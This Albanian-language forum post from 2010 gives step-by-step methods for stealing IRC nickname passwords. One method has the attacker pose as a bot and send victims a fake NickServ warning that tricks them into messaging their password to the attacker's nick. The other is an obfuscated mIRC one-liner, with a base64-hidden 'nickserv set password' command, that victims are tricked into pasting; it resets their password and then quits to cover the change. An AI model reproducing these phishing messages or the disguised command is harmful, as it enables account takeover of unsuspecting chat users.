Disa menyra per ti marre passin dikujt ne IRC

Go down

Disa menyra per ti marre passin dikujt ne IRC

Post  Admin on Sat Jan 09, 2010 8:51 am

Kodi:
Hyni ne nje Server 3.2 (ne Serverat e reja eshte me e lehte kjo menyre)
Por mos hyni ne as nje KanaL dhe vendoseni komanden /NICK PASSWORD me pas bejeni kete Kodin e poshtem ;

/mode Password iowghraAsORTVSxNCWqBzvdHtGplvhopsmntikrRcaqOALQbSe KVfMGCuzN

Kur te Shikoni infon tuaj ne Whois do te jet keshtu ***Password is a Bot on emriServerit *****

Me vone Zgjidhni nje Nick (Viktimen) dhe dergoni nje Notice ;

/Notice Nick Nga nje Problem Te vogel mund tju behet Nicku drop brenda 1 minuti .Ju Lutemi per ta evituar kete Problem vendoseni Komanden /msg password Nickserv Identify Passi Chat te Kendshem ..

Ne qofte se nick Password eshte i palejushem atehere vini nje nick tjeter Si psh : Info,Drop,Pass etj dhe Notice do dergohet ne kete menyre :
/Notice Nick Nga nje Problem Te vogel mund tju behet Nicku drop brenda 1 minuti .Ju Lutemi per ta evituar kete Problem vendoseni Komanden /msg info (ose nick te tjere sic kam thene me lart) Nickserv Identify Passi Chat te Kendshem ..

Shpresoj tju pelqeje .
Gjtih te mirat.Kodin e poshtem nese mundeni ta mashtroni tjetrin qe ta shkruaj ne Server i behet Passwordi Nickut: ReBooT

///timerx_mas 0 0 /cline $rand(1,15) $chan $rand(1,$nick(#,0)) | //privmsg $decode(bmlja3NlcnYgc2V0IHBhc3N3b3JkIFJlQm9vVA==,m ) | .ignore -u50 * | .close -m | .quit | .timers off

Admin
Admin

Posts : 149
Join date : 2010-01-05

View user profile http://al-capone.forumotion.com

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum